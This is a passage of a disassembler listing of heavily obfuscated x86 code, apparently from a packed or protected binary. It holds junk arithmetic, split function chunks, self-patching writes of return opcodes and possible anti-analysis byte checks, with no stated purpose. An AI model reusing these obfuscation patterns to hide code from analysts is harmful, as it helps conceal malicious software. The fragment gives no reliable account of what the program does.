; FUNCTION CHUNK AT 00443174 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445DDE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447BC0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00449ABD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B471 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CD45 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044E4AB SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004528F0 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004531C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453CFA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00454A43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454B9A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004556C9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458969 SIZE 00000019 BYTES
xchg eax, [esp+0]
pop eax
pushf
push 76344D33h
pop edi
jmp loc_458969
sub_45967C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_45968C: ; CODE XREF: ut7h7i2x:00443EEFj
jz loc_44248A
ror ebx, 9
shr ebx, 1Eh
sbb edx, 0E7DA1561h
sub eax, ebx
loc_4596A0: ; CODE XREF: ut7h7i2x:loc_44761Ej
pop large dword ptr fs:0
add esp, 4
jmp loc_43AE81
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457453
loc_4596AF: ; CODE XREF: sub_457453+1E25j
add eax, 0E8208C20h
mov eax, [eax]
or eax, eax
jnz loc_44C3DA
jmp loc_458858
; END OF FUNCTION CHUNK FOR sub_457453
; ---------------------------------------------------------------------------
locret_4596C4: ; CODE XREF: ut7h7i2x:loc_442A8Ej
retn
; ---------------------------------------------------------------------------
loc_4596C5: ; CODE XREF: ut7h7i2x:0043BE6Bj
mov edx, ecx
push offset loc_44FA87
jmp loc_44CB7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_4596D1: ; CODE XREF: sub_441765:loc_447472j
xor ebx, 312D4D7Eh
add ebx, 31D3938Ah
xchg ebx, [esp+4+var_4]
jmp loc_446263
; END OF FUNCTION CHUNK FOR sub_441765
; =============== S U B R O U T I N E =======================================
sub_4596E5 proc near ; CODE XREF: sub_44AA54-613Dj
; sub_44B96Dp ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043F70E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443789 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444908 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044F6C2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00455193 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A926 SIZE 00000014 BYTES
pop edx
jo loc_45A926
mov eax, [esp+4+var_4]
push edx
nop
push 0DC04E21h
pop eax
rol eax, 8
jmp loc_43F70E
sub_4596E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4596FF proc near ; DATA XREF: sub_447167:loc_452E10o
; FUNCTION CHUNK AT 00455636 SIZE 00000005 BYTES
mov eax, [esp+0]
push edx
push offset loc_459FCA
jmp loc_455636
sub_4596FF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_45970D: ; CODE XREF: sub_4462B0-99FBj
rol esi, 0Bh
cmp esi, 0DA447DE8h
jmp loc_454475
; END OF FUNCTION CHUNK FOR sub_4462B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_407. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_45971C: ; CODE XREF: ut7h7i2x:00445D95j
jmp loc_445ABF
; ---------------------------------------------------------------------------
loc_459721: ; CODE XREF: ut7h7i2x:0044DD8Cj
jnz loc_44F1DD
jmp loc_44C310
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45168E
loc_45972C: ; CODE XREF: sub_45168E:loc_44FA27j
pop eax
xor eax, 6784C075h
jnz loc_43D5DA
sub edx, ecx
xor edx, 9C2D854Dh
and ebx, 32F99886h
jmp loc_43D5DA
; END OF FUNCTION CHUNK FOR sub_45168E
; ---------------------------------------------------------------------------
loc_45974C: ; CODE XREF: ut7h7i2x:00451A2Dj
sbb edx, ebp
; =============== S U B R O U T I N E =======================================
sub_45974E proc near ; CODE XREF: sub_447EDC+6p
xchg eax, [esp+0]
pop eax
loc_459752: ; CODE XREF: ut7h7i2x:loc_444BCFj
push edi
push 35A0FF74h
pop edi
jmp loc_457D42
sub_45974E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_45975E: ; CODE XREF: ut7h7i2x:0043F243j
or eax, edi
; =============== S U B R O U T I N E =======================================
sub_459760 proc near ; CODE XREF: sub_43E9CB:loc_43DE3Fp
; FUNCTION CHUNK AT 0044057A SIZE 0000001C BYTES
xchg edx, [esp+0]
pop edx
mov [ebp-4], eax
push 69561AC3h
pop eax
jmp loc_44057A
sub_459760 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_459772 proc near ; CODE XREF: sub_4549F0-51CEj
; sub_4549F0:loc_45AA31j
; FUNCTION CHUNK AT 0044E74F SIZE 00000011 BYTES
push ebx
push 8E06DF50h
pop ebx
add ebx, 271EBFEFh
and ebx, 9E14A824h
jmp loc_44E74F
sub_459772 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_45978A: ; CODE XREF: sub_43F1B2+17A3Dj
test eax, 402FF5D9h
jmp loc_44B89C
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
loc_459795: ; CODE XREF: ut7h7i2x:0044E600j
jz loc_456678
jmp loc_456DCA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_4597A0: ; CODE XREF: sub_44EC11+5240j
add edx, ebp
; END OF FUNCTION CHUNK FOR sub_44EC11
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_4597A2: ; CODE XREF: sub_44E2C4:loc_446AE1j
add edx, 553E423Eh
mov edx, [edx]
loc_4597AA: ; CODE XREF: sub_43D021:loc_457E12j
call sub_4576C6
loc_4597AF: ; CODE XREF: sub_45AAD1-ED57j
jmp loc_4392D2
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
loc_4597B4: ; CODE XREF: ut7h7i2x:loc_43D3D6j
call sub_453D8B
jns loc_4390C9
mov edx, 0A22F8A70h
push offset loc_43CE7A
jmp loc_45AA7B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446BB5
loc_4597CE: ; CODE XREF: sub_446BB5+17j
xchg ebx, [esp+0]
jmp loc_455F3D
; END OF FUNCTION CHUNK FOR sub_446BB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4597D6: ; CODE XREF: sub_439BF8+B694j
; sub_444029:loc_44F67Ej
push 8AABE2CFh
pop eax
and eax, 6D34BDB8h
rol eax, 0Dh
xor eax, 0CF7A7613h
add eax, ebp
add eax, 249488CDh
mov eax, [eax]
jmp loc_440112
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_4597FA: ; CODE XREF: sub_4462B0-2D3Fj
jnz loc_43BA03
jmp loc_44CB69
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45439C
loc_459805: ; CODE XREF: sub_45439C+Aj
mov eax, [ebp-8]
push offset loc_448E25
jmp nullsub_391
; END OF FUNCTION CHUNK FOR sub_45439C
; =============== S U B R O U T I N E =======================================
sub_459812 proc near ; DATA XREF: ut7h7i2x:0044AB25o
; FUNCTION CHUNK AT 00448C30 SIZE 00000005 BYTES
xchg edi, [esp+0]
push offset sub_43F7F8
jmp loc_448C30
sub_459812 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445DB4
loc_45981F: ; CODE XREF: sub_445DB4:loc_450E82j
sub eax, ebx
shr edx, 1Bh
sbb ebx, ecx
pop eax
pop edx
pop ecx
jmp loc_44F827
; END OF FUNCTION CHUNK FOR sub_445DB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_45982E: ; CODE XREF: sub_43B847:loc_4554A9j
test edi, 200h
jmp loc_44B010
; END OF FUNCTION CHUNK FOR sub_43B847
; ---------------------------------------------------------------------------
loc_459839: ; CODE XREF: ut7h7i2x:0044B583j
add esi, edx
; =============== S U B R O U T I N E =======================================
sub_45983B proc near ; CODE XREF: sub_458CA4-B3E3p
; FUNCTION CHUNK AT 00445149 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE0C SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
imul byte ptr [edx]
cmp al, 0A4h
jz loc_451AAA
jmp loc_445149
sub_45983B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_45984E proc near ; DATA XREF: ut7h7i2x:004463E1o
mov eax, [esp+0]
call sub_454196
retn
sub_45984E endp
; ---------------------------------------------------------------------------
db 29h
dword_459858 dd 0 ; DATA XREF: sub_44DF79:loc_43C122r
; sub_44DF79+6r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_45985C: ; CODE XREF: sub_43A513+1E3D9j
jmp loc_454215
; END OF FUNCTION CHUNK FOR sub_43A513
; =============== S U B R O U T I N E =======================================
sub_459861 proc near ; CODE XREF: sub_41A6D9+299p
; sub_459861+5j
; DATA XREF: ...
call sub_43C39B
jmp ds:off_41D030
sub_459861 endp
; ---------------------------------------------------------------------------
loc_45986C: ; CODE XREF: ut7h7i2x:00443CC3j
; ut7h7i2x:loc_456FE8j
jmp loc_446EE5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BFF8
loc_459871: ; CODE XREF: sub_43BFF8+4772j
; ut7h7i2x:0044077Ej
or edx, 9FD8AC78h
sub edx, 0B00F1E30h
rol edx, 13h
add edx, 75D1297Ah
mov [edx], eax
jmp loc_446CAF
; END OF FUNCTION CHUNK FOR sub_43BFF8
; ---------------------------------------------------------------------------
loc_45988D: ; CODE XREF: ut7h7i2x:0045277Bj
xchg ebx, ecx
or ebx, edi
loc_459891: ; CODE XREF: ut7h7i2x:loc_44ECF8j
or esi, edx
mov [ebp+0], ebx
jmp loc_44347D
; ---------------------------------------------------------------------------
sbb esi, 0FF5BB873h
jmp loc_448D35
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_4598A6: ; CODE XREF: sub_447EB5:loc_4505B6j
add ecx, 0E543DB8Fh
xchg ecx, [esp+4+var_4]
jmp loc_451B64
; END OF FUNCTION CHUNK FOR sub_447EB5
; =============== S U B R O U T I N E =======================================
sub_4598B4 proc near ; CODE XREF: sub_457F2D-6C70p
; ut7h7i2x:004590CAj
xchg edx, [esp+0]
pop edx
lea eax, nullsub_151
mov byte ptr [eax], 0C3h
jmp loc_43EF63
sub_4598B4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459070
loc_4598C6: ; CODE XREF: sub_459070:loc_45563Bj
or esi, 0AAC36987h
rol esi, 17h
; END OF FUNCTION CHUNK FOR sub_459070
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_4598CF: ; CODE XREF: sub_44B72F+35DFj
jnb loc_44646C
and ebp, 5498A418h
jmp loc_446468
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
sub edx, ebp
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_4598E2: ; CODE XREF: sub_4503C3:loc_44A125j
jmp sub_44DF67
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_4598E7: ; CODE XREF: sub_459E54:loc_43B8F3j
add edx, ebp
push ecx
push 0FCC3C03Fh
pop ecx
xor ecx, 87930C75h
sub ecx, 6BFA00F7h
and ecx, 0DCE46E3Ah
jmp loc_43D160
; END OF FUNCTION CHUNK FOR sub_459E54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459653
loc_459907: ; CODE XREF: sub_459653-314Fj
dec dword ptr [ebp-24h]
jnz loc_442CDC
jmp loc_45418A
; END OF FUNCTION CHUNK FOR sub_459653
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_459915: ; CODE XREF: sub_4503C3+5319j
rol eax, 1Ch
push offset sub_4469AD
jmp loc_450B44
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
loc_459922: ; CODE XREF: ut7h7i2x:00448E0Aj
pushf
; =============== S U B R O U T I N E =======================================
sub_459923 proc near ; CODE XREF: sub_444AA3:loc_43B3ABp
xchg edx, [esp+0]
pop edx
add eax, 84C33CCAh
rol eax, 1Dh
jmp loc_44256E
sub_459923 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_459935 proc near ; DATA XREF: sub_45A1E9+3o
; FUNCTION CHUNK AT 00442D24 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00445C61 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446567 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B710 SIZE 00000006 BYTES
xchg eax, [esp+0]
pushf
push 42FF18E4h
pop edx
or edx, 4FD77CF1h
rol edx, 1
jmp loc_446567
sub_459935 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D56
loc_45994C: ; CODE XREF: sub_452D56:loc_446D12j
pop edx
; END OF FUNCTION CHUNK FOR sub_452D56
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_45994D: ; CODE XREF: sub_43DBEC:loc_44F6FDj
xchg edx, [esp+0]
push edx
push 988DD832h
jmp loc_43A122
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4555CE
loc_45995B: ; CODE XREF: sub_4555CE+11j
jnz loc_4537FE
jmp loc_448522
; END OF FUNCTION CHUNK FOR sub_4555CE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_95. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_459967: ; CODE XREF: ut7h7i2x:004571DEj
jmp loc_43F5D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F7F8
loc_45996C: ; CODE XREF: sub_44F7F8-15F8Aj
jmp nullsub_393
; END OF FUNCTION CHUNK FOR sub_44F7F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_459971: ; CODE XREF: sub_4431FF:loc_441446j
; sub_4431FF+9125j
call sub_43F117
mov ds:dword_44A870, eax
xor eax, eax
mov [ebp+var_4], eax
loc_459980: ; CODE XREF: sub_452D3D-79FEj
; sub_4431FF+A8FFj
jz loc_4552A1
jmp loc_439088
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
add ebp, edi
jmp sub_45459E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44947D
loc_459992: ; CODE XREF: sub_44947D:loc_44C863j
xor edx, 3340752Fh
call sub_43C9F5
loc_45999D: ; CODE XREF: sub_4569C5+1Ej
jmp loc_44B4E3
; END OF FUNCTION CHUNK FOR sub_44947D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_4599A2: ; CODE XREF: sub_44CE09+359Dj
jmp loc_454DCF
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BD9
loc_4599A7: ; CODE XREF: sub_443BD9+23j
jmp loc_4531E6
; END OF FUNCTION CHUNK FOR sub_443BD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F000
loc_4599AC: ; CODE XREF: sub_44F000:loc_44FA2Cj
sub esi, 50289104h
or esi, 7D026B16h
and esi, ds:4000F7h
add esi, 228952DEh
add esi, ebp
add esi, 9D7621D0h
jmp loc_4532C7
; END OF FUNCTION CHUNK FOR sub_44F000
; ---------------------------------------------------------------------------
adc ebp, 459F4FE5h
jmp sub_445346
; ---------------------------------------------------------------------------
shl esi, 1
jmp sub_43AD46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EBA8
loc_4599E3: ; CODE XREF: sub_44EBA8+Ej
rol eax, 0Ah
sub eax, 46373671h
rol eax, 2
sub eax, 9FF474BDh
jmp loc_44003D
; END OF FUNCTION CHUNK FOR sub_44EBA8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_4599FA: ; CODE XREF: sub_43BA9E:loc_451238j
ja loc_43D615
jmp loc_43FCA6
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_459A05: ; CODE XREF: sub_44A3BB:loc_44F810j
add eax, 1F16ED3Dh
jmp loc_446388
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_459A10: ; CODE XREF: sub_44064B:loc_4574B0j
cmp dword ptr [ebp-10h], 0
jnz loc_43FA11
mov eax, [ebp+8]
push eax
cmp dword ptr [ebp-14h], 6
setz al
call sub_45A2AD
pop ecx
jmp loc_453BB0
; END OF FUNCTION CHUNK FOR sub_44064B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_459A30: ; CODE XREF: sub_45601B:loc_442E9Ej
jnz loc_45A74E
jmp loc_454D88
; END OF FUNCTION CHUNK FOR sub_45601B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_552. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, 469EF90Dh
push esi
push 1AEF81E6h
pop esi
and esi, ds:4000F1h
jmp loc_4577FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_459A53: ; CODE XREF: sub_455060:loc_458409j
jnz loc_4595D9
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
jmp loc_4410A8
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
pushf
jmp sub_456944
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44491C
loc_459A6B: ; CODE XREF: sub_44491C:loc_4530C9j
jmp ds:off_41D1B0
; END OF FUNCTION CHUNK FOR sub_44491C
; =============== S U B R O U T I N E =======================================
sub_459A71 proc near ; CODE XREF: sub_44491Cp
; sub_44F774:loc_447478j ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044BB87 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00451831 SIZE 00000005 BYTES
pop edx
jnb loc_44BB9B
mov eax, [esp-4+arg_0]
push edx
call sub_45341C
loc_459A81: ; CODE XREF: sub_446F56+58D8j
mov eax, 205AA81Dh
call sub_43AA94
jmp loc_44BB87
sub_459A71 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_459A90 proc near ; CODE XREF: ut7h7i2x:00442FD3p
; ut7h7i2x:00458AC6j
xchg ecx, [esp+0]
sub_459A90 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_45633E
loc_459A93: ; CODE XREF: sub_45633E:loc_443921j
pop ecx
mov ds:off_41D064, eax
lea eax, sub_44D43D
loc_459AA0: ; CODE XREF: sub_457A66:loc_446057j
mov byte ptr [eax], 0C3h
jmp sub_44D43D
; END OF FUNCTION CHUNK FOR sub_45633E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D43D
loc_459AA8: ; CODE XREF: sub_44D43D-A965j
mov eax, [esp-4+arg_0]
push ebp
jmp loc_4451E3
; END OF FUNCTION CHUNK FOR sub_44D43D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445822
loc_459AB1: ; CODE XREF: sub_445822:loc_43A585j
lea eax, nullsub_22
mov byte ptr [eax], 0C3h
jmp nullsub_22
; END OF FUNCTION CHUNK FOR sub_445822
; ---------------------------------------------------------------------------
push ebx
push 5457552h
jmp loc_4448D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_459ACA: ; CODE XREF: sub_43AB62+13529j
; sub_43AB62:loc_44EF96j
add eax, 66FB1B73h
loc_459AD0: ; CODE XREF: ut7h7i2x:00455004j
add eax, ebp
add eax, 4B80D369h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_446918
jmp loc_445B27
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_459AE8: ; CODE XREF: sub_43F0B0+E29j
jnz loc_44FED0
jmp loc_4489BF
; END OF FUNCTION CHUNK FOR sub_43F0B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_248. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A0CE
loc_459AF4: ; CODE XREF: sub_44A0CE:loc_450F7Dj
mov eax, [esp-4+arg_0]
push edx
call sub_444E04
mov eax, 649E33C4h
call sub_45854D
push ecx
jmp loc_43EC74
; END OF FUNCTION CHUNK FOR sub_44A0CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_459B0D: ; CODE XREF: sub_456B19+Fj
xor edx, 926B6711h
cmp edx, 0E362FFAh
jmp loc_447FEC
; END OF FUNCTION CHUNK FOR sub_456B19
; ---------------------------------------------------------------------------
loc_459B1E: ; CODE XREF: ut7h7i2x:loc_44200Fj
jnz loc_43F2B5
jmp loc_44FAA4
; ---------------------------------------------------------------------------
loc_459B29: ; CODE XREF: ut7h7i2x:0044C2C2j
sub ebp, 4052F11Ah
pop eax
loc_459B30: ; CODE XREF: ut7h7i2x:loc_444B7Ej
mov eax, offset off_4513B0
push offset loc_4569F5
jmp loc_44DBD6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_355. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4394AA
loc_459B40: ; CODE XREF: sub_4394AA+3j
push ecx
mov esp, ebp
xchg ecx, [esp+4+var_4]
; END OF FUNCTION CHUNK FOR sub_4394AA
; START OF FUNCTION CHUNK FOR sub_43D797
loc_459B46: ; CODE XREF: sub_43D797+7B33j
mov ebp, ecx
jmp loc_450933
; END OF FUNCTION CHUNK FOR sub_43D797
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_459B4D: ; CODE XREF: sub_450FDE-155E0j
sbb esi, 0D49AD6D6h
jmp loc_4418C1
; END OF FUNCTION CHUNK FOR sub_450FDE
; =============== S U B R O U T I N E =======================================
sub_459B58 proc near ; CODE XREF: sub_40F8D4+2Dp
; sub_419EB0+30p ...
; FUNCTION CHUNK AT 0043BADA SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043D08C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FA3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FD95 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00441260 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00444529 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00445B1A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448BC4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D65C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00459F9D SIZE 00000005 BYTES
js loc_44D65C
call sub_4442CC
loc_459B63: ; CODE XREF: sub_44DB48-395Cj
jmp loc_445B1A
sub_459B58 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A76A
loc_459B68: ; CODE XREF: sub_43A76A+7516j
; sub_43A76A:loc_452236j
push 0DDCF8A30h
pop eax
and eax, 5B273AB1h
or eax, 2C11368Bh
add eax, 90180A9Ch
add eax, ebp
jmp loc_453218
; END OF FUNCTION CHUNK FOR sub_43A76A
; =============== S U B R O U T I N E =======================================
sub_459B87 proc near ; DATA XREF: ut7h7i2x:004403FBo
sub eax, 0EA0E2AF5h
rol eax, 15h
push ecx
push 0AB55A114h
pop ecx
and ecx, 16CE7A18h
xor ecx, 231EAD2h
jmp loc_4472F8
sub_459B87 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451971
loc_459BA8: ; CODE XREF: sub_451971-5FBj
jz loc_443C65
; END OF FUNCTION CHUNK FOR sub_451971
; START OF FUNCTION CHUNK FOR sub_44E361
loc_459BAE: ; CODE XREF: sub_44E361+Ej
jmp loc_445DE9
; END OF FUNCTION CHUNK FOR sub_44E361
; ---------------------------------------------------------------------------
shr esi, 8
shl ebp, 0Dh
mov ebp, edx
jmp loc_443C59
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_459BC0: ; CODE XREF: sub_440CEC:loc_449FA6j
mov ebx, [edx]
loc_459BC2: ; CODE XREF: sub_44B43D:loc_440220j
jg loc_447B71
jmp loc_45A55C
; END OF FUNCTION CHUNK FOR sub_440CEC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_389. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_459BCE: ; CODE XREF: ut7h7i2x:0043AF50j
jmp loc_44FB27
; ---------------------------------------------------------------------------
loc_459BD3: ; DATA XREF: sub_43B0A8+1o
mov ebp, esp
mov esp, ebp
pop ebp
mov eax, ds:dword_43A7BC
or eax, eax
jnz loc_447E52
call sub_453D8B
jmp loc_44EF55
; =============== S U B R O U T I N E =======================================
sub_459BF0 proc near ; CODE XREF: sub_43F071+11652p
; ut7h7i2x:004569F0j
; FUNCTION CHUNK AT 0043BA8E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045829F SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
add ecx, 5C6441Ch
mov [ecx], eax
pop ecx
call sub_45444E
jmp loc_43BA8E
sub_459BF0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F300
loc_459C07: ; CODE XREF: sub_44F300:loc_451111j
mov eax, [ebp-4]
cmp byte ptr [eax], 0EBh
loc_459C0D: ; CODE XREF: sub_439BF8+12F17j
jz loc_44920C
mov eax, [ebp-4]
jmp loc_44CA10
; END OF FUNCTION CHUNK FOR sub_44F300
; =============== S U B R O U T I N E =======================================
sub_459C1B proc near ; DATA XREF: sub_44949C-87FEo
; FUNCTION CHUNK AT 0043DEAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045115F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E35 SIZE 00000008 BYTES
pushf
push 0D581D5EDh
pop edi
xor edi, 0F57DF4ECh
add edi, 0DF480BB4h
popf
jmp loc_45115F
sub_459C1B endp
; ---------------------------------------------------------------------------
loc_459C34: ; CODE XREF: ut7h7i2x:00457354j
mov esi, eax
pop eax
rol esi, 0Fh
xor esi, 3EF2A00Eh
jmp loc_450BBE
; =============== S U B R O U T I N E =======================================
sub_459C45 proc near ; CODE XREF: sub_448FB6+13p
; ut7h7i2x:00451EB0j
xchg eax, [esp+0]
pop eax
call sub_444DE9
call sub_43CB0D
sub_459C45 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_459111
loc_459C53: ; CODE XREF: sub_459111-17910j
jz loc_43EBBA
jmp loc_4440B9
; END OF FUNCTION CHUNK FOR sub_459111
; =============== S U B R O U T I N E =======================================
sub_459C5E proc near ; DATA XREF: sub_4524FE-134D8o
pop ebp
retn 8
sub_459C5E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B83C
loc_459C62: ; CODE XREF: sub_43B83C+1D24Aj
jmp loc_44573C
; END OF FUNCTION CHUNK FOR sub_43B83C
; ---------------------------------------------------------------------------
loc_459C67: ; CODE XREF: ut7h7i2x:0043A5EDj
jmp sub_455807
; ---------------------------------------------------------------------------
loc_459C6C: ; CODE XREF: ut7h7i2x:004465D3j
; ut7h7i2x:00450308j
jns loc_4416D5
cmp dword ptr [ebp-10Ch], 6D676552h
jnz loc_442C9A
jmp loc_447DED
; =============== S U B R O U T I N E =======================================
sub_459C87 proc near ; CODE XREF: sub_440358+7p
; ut7h7i2x:00447A00j
; FUNCTION CHUNK AT 0043AB88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044287C SIZE 00000019 BYTES
xchg esi, [esp+0]
pop esi
push ecx
mov ecx, edx
xchg ecx, [esp+0]
call sub_4445DC
mov eax, 22143682h
jmp loc_44287C
sub_459C87 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_336. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_423. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459FE9
loc_459CA2: ; CODE XREF: sub_459FE9-DC2Ej
pop ebx
or edx, 826FB367h
add edx, 7DED1C66h
and edx, 79147F1Fh
sub edx, 2B45E92Ah
jmp loc_44312F
; END OF FUNCTION CHUNK FOR sub_459FE9
; ---------------------------------------------------------------------------
loc_459CC0: ; CODE XREF: ut7h7i2x:0044CC95j
jz loc_45395D
